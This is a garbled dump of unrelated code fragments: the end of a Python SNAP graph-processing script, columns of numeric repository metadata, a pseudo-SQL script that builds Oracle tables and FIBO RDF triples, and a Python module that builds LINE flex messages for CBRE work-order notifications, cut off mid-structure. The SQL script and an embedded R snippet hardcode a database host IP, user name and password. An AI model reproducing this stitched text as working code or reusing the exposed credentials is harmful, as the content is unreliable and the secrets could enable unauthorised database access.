dexPer0, dexPer1 = pick_node_compute_dexPer(Graph, k_ring, NId)
D0_k_ring_extended = open(D0_output, 'a')
D1_k_ring_extended = open(D1_output, 'a')
D0_k_ring_extended.write("%d \t %s\n" % (NId, dexPer0))
dexPer0 = None
D0_k_ring_extended.close()
D1_k_ring_extended.write("%d \t %s\n" % (NId, dexPer1))
dexPer1 = None
D1_k_ring_extended.close()
def dexPer_of_all_vertices_parallel(filename, k_ring):
Graph = snap.LoadEdgeList(snap.PUNGraph, filename, 0, 1, '\t')
Nodes = []
for NI in Graph.Nodes():
NI_Id = NI.GetId()
Nodes.append(NI_Id)
pool = Pool(8)
func = partial(dexPer_of_a_vertex, filename, k_ring)
dexPer_all = pool.map(func, Nodes)
pool.close()
pool.join()
return [ item[0] for item in dexPer_all], [ item[1] for item in dexPer_all]
def RW_dexPer_of_all_vertices_parallel(filename, num_steps, rate):
Graph = snap.LoadEdgeList(snap.PUNGraph, filename, 0, 1, '\t')
Nodes = []
for NI in Graph.Nodes():
NI_Id = NI.GetId()
Nodes.append(NI_Id)
pool = Pool(8)
func = partial(RW_dexPer_of_a_vertex, filename, num_steps, rate)
dexPer_all = pool.map(func, Nodes)
pool.close()
pool.join()
return [ item[0] for item in dexPer_all], [ item[1] for item in dexPer_all]
def RW_dexPer_of_all_vertices_in_kring_parallel(filename, num_steps, rate, k_ring):
Graph = snap.LoadEdgeList(snap.PUNGraph, filename, 0, 1, '\t')
Nodes = []
for NI in Graph.Nodes():
NI_Id = NI.GetId()
Nodes.append(NI_Id)
pool = Pool(8)
func = partial(RW_dexPer_of_a_vertex_in_kring, filename, num_steps, rate, k_ring)
dexPer_all = pool.map(func, Nodes)
pool.close()
pool.join()
return [ item[0] for item in dexPer_all], [ item[1] for item in dexPer_all]
def RW_dexPer_of_all_vertices_steps_parallel(filename, num_steps):
Graph = snap.LoadEdgeList(snap.PUNGraph, filename, 0, 1, '\t')
Nodes = []
for NI in Graph.Nodes():
NI_Id = NI.GetId()
Nodes.append(NI_Id)
pool = Pool(8)
func = partial(RW_dexPer_of_a_vertex_steps, filename, num_steps)
dexPer_all = pool.map(func, Nodes)
pool.close()
pool.join()
return [ item[0] for item in dexPer_all], [ item[1] for item in dexPer_all]
| 36.26747
| 135
| 0.572553
| 3,660
| 30,102
| 4.410383
| 0.045082
| 0.048321
| 0.027878
| 0.029984
| 0.956015
| 0.939351
| 0.917173
| 0.898959
| 0.888304
| 0.87071
| 0
| 0.020742
| 0.271278
| 30,102
| 829
| 136
| 36.311218
| 0.715126
| 0.015115
| 0
| 0.875399
| 0
| 0
| 0.001441
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055911
| false
| 0
| 0.011182
| 0
| 0.132588
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7351006eeecd2d5905c7afc937fbaf53aa95984f
| 7,556
|
py
|
Python
|
tests/FIBO1.py
|
nelmiux/CS347-Data_Management
|
1e9d87097b5a373f9312b0d6b413198e495fd6c0
|
[
"CNRI-Jython"
] | null | null | null |
tests/FIBO1.py
|
nelmiux/CS347-Data_Management
|
1e9d87097b5a373f9312b0d6b413198e495fd6c0
|
[
"CNRI-Jython"
] | null | null | null |
tests/FIBO1.py
|
nelmiux/CS347-Data_Management
|
1e9d87097b5a373f9312b0d6b413198e495fd6c0
|
[
"CNRI-Jython"
] | null | null | null |
conn = connectTo 'jdbc:oracle:thin:@128.83.138.158:1521:orcl' 'C##cs347_prof' 'orcl_prof' 'rdf_mode' 'FIBO1';
conn1 = connectTo 'jdbc:oracle:thin:@128.83.138.158:1521:orcl' 'C##cs347_prof' 'orcl_prof' 'native_mode' 'FIBO1';
SQL on conn """ create table Thing(thing_id integer, name varchar(255)) """
SQL on conn """ create table EquityOwner(equity_owner_id integer, name varchar(255)) """
SQL on conn """ create table Role(role_id integer, name varchar(255)) """
SQL on conn """ create table Equity(equity_id integer, name varchar(255)) """
SQL on conn """ create table StockholderEquity(sh_equity_id integer, name varchar(255)) """
SQL on conn """ create table FormallyConstitutedOrganizaiton(fco_id integer, name varchar(255)) """
SQL on conn """ create table BodyCorporation(bc_id integer, name varchar(255)) """
SQL on conn """ create table BodyCorporationWithEquity(bcwe_id integer, name varchar(255)) """
SQL on conn """ create table IncorporatedCompany(ic_id integer, name varchar(255)) """
SQL on conn1 """ INSERT INTO FIBO1_C##CS347_PROF_DATA VALUES ( FIBO1_C##CS347_PROF_SQNC.nextval, SDO_RDF_TRIPLE_S('FIBO1_C##CS347_PROF:<http://www.example.org/people.owl>', 'http://www.example.org/people.owl#BodyCorporation', 'http://www.w3.org/2000/01/rdf-schema#subClassOf', 'http://www.example.org/people.owl#FormallyConstitutedOrganizaiton')); """
SQL on conn1 """ INSERT INTO FIBO1_C##CS347_PROF_DATA VALUES ( FIBO1_C##CS347_PROF_SQNC.nextval, SDO_RDF_TRIPLE_S('FIBO1_C##CS347_PROF:<http://www.example.org/people.owl>', 'http://www.example.org/people.owl#BodyCorporationWithEquity', 'http://www.w3.org/2000/01/rdf-schema#subClassOf', 'http://www.example.org/people.owl#BodyCorporation')); """
SQL on conn1 """ INSERT INTO FIBO1_C##CS347_PROF_DATA VALUES ( FIBO1_C##CS347_PROF_SQNC.nextval, SDO_RDF_TRIPLE_S('FIBO1_C##CS347_PROF:<http://www.example.org/people.owl>', 'http://www.example.org/people.owl#IncorporatedCompany', 'http://www.w3.org/2000/01/rdf-schema#subClassOf', 'http://www.example.org/people.owl#BodyCorporationWithEquity')); """
SQL on conn """ create table fibo_be_oac_cown_02(fibo2_id integer, name varchar(255)) """
SQL on conn """ create table ConstitutionalOwner(co_id integer) """
SQL on conn """ create table TransferableContractHolder(tch_id integer, name varchar(255)) """
SQL on conn """ create table Shareholder(shareholder_id integer, name varchar(255)) """
SQL on conn """ create table PublicShareholder(psh_id integer, name varchar(255)) """
SQL on conn """ create table RegisteredShareholder(rsh_id integer, name varchar(255)) """
SQL on conn """ create table BeneficialOwner(bo_id integer, name varchar(255)) """
SQL on conn """ create table fibo_be_oac_cown_01(fibo1_id integer, name varchar(255)) """
SQL on conn """ create table FinancialAsset(fa_id integer, name varchar(255)) """
SQL on conn """ create table Sharholding(shing_id integer, name varchar(255)) """
SQL on conn """ create table Zipcode(zipcode_id integer, name varchar(255)) """
SQL on conn """ insert into FormallyConstitutedOrganizaiton(zipcode) values (rel_zipcode) """
SQL on conn """ insert into Zipcode(zipcode) values (rel_zipcode) """
connr = connectTo 'jdbc:oracle:thin:@128.83.138.158:1521:orcl' 'C##cs347_prof' 'orcl_prof' 'rdf_mode' 'FIBOR';
SQL on connr """ insert into BodyCorporation(x, zip_code) values (1, 78733) """
SQL on conn1 """ INSERT INTO FIBOR_C##CS347_PROF_DATA VALUES ( FIBOR_C##CS347_PROF_SQNC.nextval, SDO_RDF_TRIPLE_S('FIBOR_C##CS347_PROF:<http://www.example.org/people.owl>', 'http://www.example.org/people.owl#zip_code', 'rdf:type', 'owl:DatatypeProperty')) """
SQL on conn1 """ INSERT INTO FIBOR_C##CS347_PROF_DATA VALUES ( FIBOR_C##CS347_PROF_SQNC.nextval, SDO_RDF_TRIPLE_S('FIBOR_C##CS347_PROF:<http://www.example.org/people.owl>', 'http://www.example.org/people.owl#zip_code', 'rdfs:domain', 'http://www.example.org/people.owl#BodyCorporation')) """
SQL on conn1 """ INSERT INTO FIBOR_C##CS347_PROF_DATA VALUES ( FIBOR_C##CS347_PROF_SQNC.nextval, SDO_RDF_TRIPLE_S('FIBOR_C##CS347_PROF:<http://www.example.org/people.owl>', 'http://www.example.org/people.owl#zip_code', 'rdf:range', 'rdfs:xsd:integer')) """
SQL on conn1 """ INSERT INTO FIBOR_C##CS347_PROF_DATA VALUES ( FIBOR_C##CS347_PROF_SQNC.nextval, SDO_RDF_TRIPLE_S('FIBOR_C##CS347_PROF:<http://www.example.org/people.owl>', 'http://www.example.org/people.owl#zip_code', 'rdf:type', 'owl:FunctionalProperty')) """
'''
SQL on connr """ insert into BodyCorporation(x, zip_code) values (2, 78734) """
SQL on connr """ insert into BodyCorporation(x, zip_code) values (3, 78735) """
SQL on connr """ insert into BodyCorporation(x, zip_code) values (4, 78736) """
SQL on connr """ insert into BodyCorporation(x, zip_code) values (5, 78737) """
SQL on connr """ insert into BodyCorporationWithEquity(x, zip_code) values (1, 78733) """
SQL on connr """ insert into BodyCorporationWithEquity(x, zip_code) values (2, 78734) """
SQL on connr """ insert into BodyCorporationWithEquity(x, zip_code) values (3, 78735) """
SQL on connr """ insert into BodyCorporationWithEquity(x, zip_code) values (4, 78736) """
SQL on connr """ insert into BodyCorporationWithEquity(x, zip_code) values (5, 78737) """
SQL on connr """ insert into IncorporatedCompany(x, zip_code) values (1, 78733) """
SQL on connr """ insert into IncorporatedCompany(x, zip_code) values (2, 78734) """
SQL on connr """ insert into IncorporatedCompany(x, zip_code) values (3, 78735) """
SQL on connr """ insert into IncorporatedCompany(x, zip_code) values (4, 78736) """
SQL on connr """ insert into IncorporatedCompany(x, zip_code) values (5, 78737) """
SQL on connr """ insert into PublicShareholder(y, zip_code) values (4, 78733) """
SQL on connr """ insert into PublicShareholder(y, zip_code) values (8, 78734) """
SQL on connr """ insert into PublicShareholder(y, zip_code) values (12, 78735) """
SQL on connr """ insert into PublicShareholder(y, zip_code) values (16, 78736) """
SQL on connr """ insert into PublicShareholder(y, zip_code) values (20, 78737) """
'''
SQL on connr """ insert into Zipcode(y, zip_code) values (4, 78733) """
SQL on connr """ insert into Zipcode(y, zip_code) values (8, 78734) """
SQL on connr """ insert into Zipcode(y, zip_code) values (12, 78735) """
SQL on connr """ insert into Zipcode(y, zip_code) values (16, 78736) """
SQL on connr """ insert into Zipcode(y, zip_code) values (20, 78737) """
r1 = SQL on connr """ select * from BodyCorporation """
r2 = SQL on connr """ select * from PublicShareholder """
r3 = SQL on connr """ select * from Zipcode """
r4 = SQL on connr """ select x, y from BodyCorporation f join Zipcode z on (f.zip_code = z.zip_code) order by 1 """
print r1
print
print r2
print
print r3
print
print r4
"""
-- truncate table FIBO1_C##CS347_PROF_DATA; truncate table FIBOR_C##CS347_PROF_DATA
SELECT a.triple.GET_SUBJECT() as subject,
a.triple.GET_PROPERTY() as property,
a.triple.GET_OBJECT() as object
from FIBO1_C##CS347_PROF_DATA a order by subject, property;
select x, y from FormallyConstitutedOrganizaiton f join Zipcode z on (f.zipcode = z.zipcode) order by 1
df <- data.frame(fromJSON(getURL(URLencode(gsub("\n", " ", '129.152.144.84:5001/rest/native/?query=
"select x, y from FormallyConstitutedOrganizaiton f join Zipcode z on (f.zip_code = z.zip_code) order by 1"
')),httpheader=c(DB='jdbc:oracle:thin:@128.83.138.158:1521:orcl', USER='C##cs347_prof', PASS='orcl_prof', MODE='rdf_mode', MODEL='FIBOR', returnDimensions = 'False', returnFor = 'JSON'), verbose = TRUE))); tbl_df(df)
"""
| 74.078431
| 351
| 0.729884
| 1,148
| 7,556
| 4.658537
| 0.137631
| 0.054226
| 0.054226
| 0.074794
| 0.799551
| 0.764772
| 0.762154
| 0.745699
| 0.738594
| 0.723822
| 0
| 0.064434
| 0.114743
| 7,556
| 101
| 352
| 74.811881
| 0.735087
| 0
| 0
| 0.061224
| 0
| 0.163265
| 0.81454
| 0.195818
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.142857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73548a738e11e71b97efef608f631774220ef7bc
| 121,305
|
py
|
Python
|
app/createflexmessage.py
|
ThebiggunSeeoil/app-cbre-exxon
|
efec395dca662132a19f882b0ff3dbb6318b3e51
|
[
"MIT"
] | null | null | null |
app/createflexmessage.py
|
ThebiggunSeeoil/app-cbre-exxon
|
efec395dca662132a19f882b0ff3dbb6318b3e51
|
[
"MIT"
] | null | null | null |
app/createflexmessage.py
|
ThebiggunSeeoil/app-cbre-exxon
|
efec395dca662132a19f882b0ff3dbb6318b3e51
|
[
"MIT"
] | null | null | null |
import datetime
class creatinglinemessages ():
def summary_by_contractor(data,date_today,planned_date):
Main_data = {"type": "flex",
"altText": "Flex Message",
"contents":
{
"type": "carousel",
"contents":[{
"type": "bubble",
"size": "giga",
"hero": {
"type": "image",
"url": "https://seeoil-web.com/cbre/Picture/CBRE-Logo.jpg",
"align": "center",
"gravity": "bottom",
"size": "full",
"aspectRatio": "20:7",
"aspectMode": "cover",
"action": {
"type": "uri",
"label": "Line",
"uri": "https://linecorp.com/"
},
"position": "relative"
},
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "Summary Report All Contractor",
"weight": "bold",
"size": "sm",
"color": "#225508FF",
"align": "center",
"contents": []
},
{
"type": "text",
"text": str(date_today),
"weight": "bold",
"size": "sm",
"color": "#225508FF",
"align": "center",
"contents": []
},
{
"type": "text",
"text": "Planned on " + planned_date,
"weight": "bold",
"size": "sm",
"color": "#225508FF",
"align": "center",
"contents": []
},
{
"type": "separator",
"margin": "sm",
"color": "#165C3CFF"
},
{
"type": "box",
"layout": "baseline",
"spacing": "sm",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "SP",
"weight": "bold",
"size": "xs",
"contents": []
},
{
"type": "text",
"text": "WR",
"weight": "bold",
"size": "xs",
"align": "center",
"position": "relative",
"contents": []
},
{
"type": "text",
"text": "SB",
"weight": "bold",
"size": "xs",
"align": "center",
"contents": []
},
{
"type": "text",
"text": "PA",
"weight": "bold",
"size": "xs",
"align": "center",
"contents": []
},
{
"type": "text",
"text": "TD-PD",
"weight": "bold",
"size": "xs",
"align": "center",
"contents": []
}
]
},
{
"type": "separator",
"margin": "md",
"color": "#165C3CFF"
},
{
"type": "text",
"text": "SP : Providor Name , WR : Work received today",
"size": "xxs",
"align": "center",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": "SB : Submitted Work , PA : Work All Pending",
"size": "xxs",
"align": "center",
"margin": "xs",
"contents": []
},
{
"type": "text",
"text": "TD-PD : Work Planned "+planned_date,
"size": "xxs",
"align": "center",
"margin": "xs",
"contents": []
}
]
}
}
]
}}
for I in data :
name = I['name']
if 'new_work_today' not in I :
new_work_today = '0'
else :
new_work_today = I['new_work_today']
if 'today_submit' not in I :
today_submit = '0'
else :
today_submit = I['today_submit']
if 'todaypending' not in I :
todaypending = '0'
else :
todaypending = I['todaypending']
if 'planned_today' not in I :
planned_today = '0'
else :
planned_today = I['planned_today']
# print (name)
# print (new_work_today)
# print (today_submit)
# print (todaypending)
# print (planned_today)
content_data = {
"type": "box",
"layout": "baseline",
"contents": [
{
"type": "text",
"text": name,
"size": "xs",
"align": "start",
"contents": []
},
{
"type": "text",
"text": str(new_work_today),
"size": "xs",
"align": "center",
"position": "relative",
"contents": []
},
{
"type": "text",
"text": str(today_submit),
"size": "xs",
"align": "center",
"contents": []
},
{
"type": "text",
"text": str(todaypending),
"size": "xs",
"align": "center",
"contents": []
},
{
"type": "text",
"text": str(planned_today),
"size": "xs",
"align": "center",
"contents": []
}
]
}
Main_data['contents']['contents'][0]['body']['contents'].insert(-4,content_data)
return Main_data
def submit_notify(request):
planned_date=request.POST.get('planned_date')
caller=request.POST.get('caller')
job_description=request.POST.get('job_description')
workorder=request.POST.get('workorder')
company=request.POST.get('company')
fls_mame_1=request.POST.get('fls_mame_1')
fls_mame_2=request.POST.get('fls_mame_2')
data = {'\n'+'SUBMIT WAH TYPE'+'\n'
+'Contractor : ' + company + '\n'
+ 'SiteName : ' + caller + '\n'
+ 'WorkOrder '+ workorder + '\n'
+ 'WorkDetail : ' + job_description + '\n'
+ 'Planned : ' + planned_date + '\n'
+ 'fls_mame_1 : ' + fls_mame_1 + '\n'
+ 'fls_mame_2 : ' + fls_mame_2 }
return data
def updatedsubmit_notify(request):
planned_date=request.POST.get('planned_date')
caller=request.POST.get('caller')
job_description=request.POST.get('job_description')
workorder=request.POST.get('workorder')
company=request.POST.get('company')
fls_mame_1=request.POST.get('fls_mame')
data = {'\n'+'UPDATED DATE WAH'+'\n'
+'Contractor : ' + company + '\n'
+ 'SiteName : ' + caller + '\n'
+ 'WorkOrder '+ workorder + '\n'
+ 'WorkDetail : ' + job_description + '\n'
+ 'Planned : ' + planned_date + '\n'
+ 'fls_mame : ' + fls_mame_1 + '\n'
}
return data
def checkout_notify(data):
for I in data :
# Title = (I['Title'])
# print (I)
workorder = I.workorder
company= I.company
opended = I.opended
status = I.status
startwork = I.startwork
completedwork = I.completedwork
caller = I.caller
wah_status = I.wah_status
timestramp = I.timestramp
planned_date = I.planned_date
job_description = I.job_description
fls_mame = I.fls_mame_1
fls_startwork = I.fls_startwork
fls_completedwork = I.fls_completedwork
fls_phone = I.fls_phone
management = I.management
remark = I.remark
type_job = I.type_job
jla_ra = I.jla_ra
any_ssw = I.any_ssw
physical = I.physical
fm = I.fm
startwork=I.startwork
# print (workorder)
# print (company)
# print (opended)
# print (status)
# print (startwork)
# print (completedwork)
# print (caller)
# print (wah_status)
# print (timestramp)
# print (planned_date)
# print (job_description)
# print (fls_mame)
# print (fls_phone)
# print (management)
# print (remark)
# print (type_job)
# print (jla_ra)
# print (any_ssw)
# print (physical)
# print (fm)
data = {'\n'+'CHECKOUT WAH TYPE'+'\n'
+'Contractor : ' + company + '\n'
+ 'SiteName : ' + caller + '\n'
+ 'WorkOrder '+ workorder + '\n'
+ 'CheckIn Name : ' + fls_startwork + '\n'
+ 'CheckOut Name : ' + fls_completedwork + '\n'
+ 'CheckIn Time : ' + str(startwork) + '\n'
+ 'CheckOut Time : ' + str(completedwork)}
return data
def checkin_notify(data):
for I in data :
# Title = (I['Title'])
# print (I)
workorder = I.workorder
company= I.company
opended = I.opended
status = I.status
startwork = I.startwork
completedwork = I.completedwork
caller = I.caller
wah_status = I.wah_status
timestramp = I.timestramp
planned_date = I.planned_date
job_description = I.job_description
fls_mame = I.fls_mame_1
fls_startwork = I.fls_startwork
fls_phone = I.fls_phone
management = I.management
remark = I.remark
type_job = I.type_job
jla_ra = I.jla_ra
any_ssw = I.any_ssw
physical = I.physical
fm = I.fm
startwork=I.startwork
# print (workorder)
# print (company)
# print (opended)
# print (status)
# print (startwork)
# print (completedwork)
# print (caller)
# print (wah_status)
# print (timestramp)
# print (planned_date)
# print (job_description)
# print (fls_mame)
# print (fls_phone)
# print (management)
# print (remark)
# print (type_job)
# print (jla_ra)
# print (any_ssw)
# print (physical)
# print (fm)
data = {'\n'+'CHECKIN WAH TYPE'+'\n'
+'Contractor : ' + company + '\n'
+ 'SiteName : ' + caller + '\n'
+ 'WorkOrder '+ workorder + '\n'
+ 'CheckIn Name : ' + fls_startwork + '\n'
+ 'CheckIn Time : ' + str(startwork)}
return data
def wahsubmit (count_wah_submit_detail,type):
print ('insile createline')
if type == 'in planing' :
data = count_wah_submit_detail
arry_contants = []
data_wah = {"type": "flex",
"altText": "Flex Message",
"contents":
{
"type": "carousel",
"contents":
arry_contants
} }
for I in data :
# Title = (I['Title'])
print (I)
workorder = I.workorder
company= I.company
opended = I.opended
status = I.status
startwork = I.startwork
completedwork = I.completedwork
caller = I.caller
wah_status = I.wah_status
timestramp = I.timestramp
planned_date = I.planned_date.strftime("%d-%m-%Y %H:%M")
job_description = I.job_description
fls_mame = I.fls_mame_1
fls_phone = I.fls_phone
management = I.management
remark = I.remark
type_job = I.type_job
jla_ra = I.jla_ra
any_ssw = I.any_ssw
physical = I.physical
fm = I.fm
print (workorder)
print (company)
print (opended)
print (status)
print (startwork)
print (completedwork)
print (caller)
print (wah_status)
print (timestramp)
print (planned_date)
print (job_description)
print (fls_mame)
print (fls_phone)
print (management)
print (remark)
print (type_job)
print (jla_ra)
print (any_ssw)
print (physical)
print (fm)
contents_submit_wah = {
"type": "bubble",
"hero": {
"type": "image",
"url": "https://seeoil-web.com/cbre/Picture/CBRE-Logo.jpg",
"align": "center",
"gravity": "bottom",
"size": "full",
"aspectRatio": "20:7",
"aspectMode": "cover",
"action": {
"type": "uri",
"label": "Line",
"uri": "https://linecorp.com/"
},
"position": "relative"
},
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "WAH - DETAIL OF WORK",
"weight": "bold",
"size": "xl",
"color": "#225508FF",
"align": "center",
"contents": []
},
{
"type": "separator",
"margin": "xs",
"color": "#E42424FF"
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Contractor :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": company,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "PlanedDate :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": str(planned_date),
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "WorkOrder :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": workorder,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "SiteName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": caller,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "JobDescriptions :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": job_description,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "FlsName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_mame,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "MobilePhoneFLS :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_phone,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "MangementName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": management,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "TypeOfJob :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": type_job,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "JLA/RAReviewed :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": jla_ra,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "WorkerInvolved ? : ",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": any_ssw,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Observation ? :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": physical,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "CBRE FM : ",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fm,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Remarks :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": remark,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
}
]
}
}
arry_contants.append(contents_submit_wah)
return data_wah
if type == 'onsite' :
data = count_wah_submit_detail
arry_contants = []
data_wah = {"type": "flex",
"altText": "Flex Message",
"contents":
{
"type": "carousel",
"contents":
arry_contants
} }
for I in data :
# Title = (I['Title'])
print (I)
workorder = I.workorder
company= I.company
opended = I.opended
status = I.status
startwork = I.startwork
completedwork = I.completedwork
caller = I.caller
wah_status = I.wah_status
timestramp = I.timestramp
planned_date = I.planned_date
job_description = I.job_description
fls_mame = I.fls_mame_1
fls_phone = I.fls_phone
management = I.management
remark = I.remark
type_job = I.type_job
jla_ra = I.jla_ra
any_ssw = I.any_ssw
physical = I.physical
fm = I.fm
print (workorder)
print (company)
print (opended)
print (status)
print (startwork)
print (completedwork)
print (caller)
print (wah_status)
print (timestramp)
print (planned_date)
print (job_description)
print (fls_mame)
print (fls_phone)
print (management)
print (remark)
print (type_job)
print (jla_ra)
print (any_ssw)
print (physical)
print (fm)
contents_submit_wah = {
"type": "bubble",
"hero": {
"type": "image",
"url": "https://seeoil-web.com/cbre/Picture/CBRE-Logo.jpg",
"align": "center",
"gravity": "bottom",
"size": "full",
"aspectRatio": "20:7",
"aspectMode": "cover",
"action": {
"type": "uri",
"label": "Line",
"uri": "https://linecorp.com/"
},
"position": "relative"
},
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "WAH - DETAIL OF WORK",
"weight": "bold",
"size": "xl",
"color": "#225508FF",
"align": "center",
"contents": []
},
{
"type": "separator",
"margin": "xs",
"color": "#E42424FF"
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Contractor :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": company,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "PlanedDate :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": str(planned_date),
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "WorkOrder :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": workorder,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "SiteName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": caller,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "JobDescriptions :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": job_description,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "FlsName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_mame,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "MobilePhoneFLS :",
"weight": "bold",
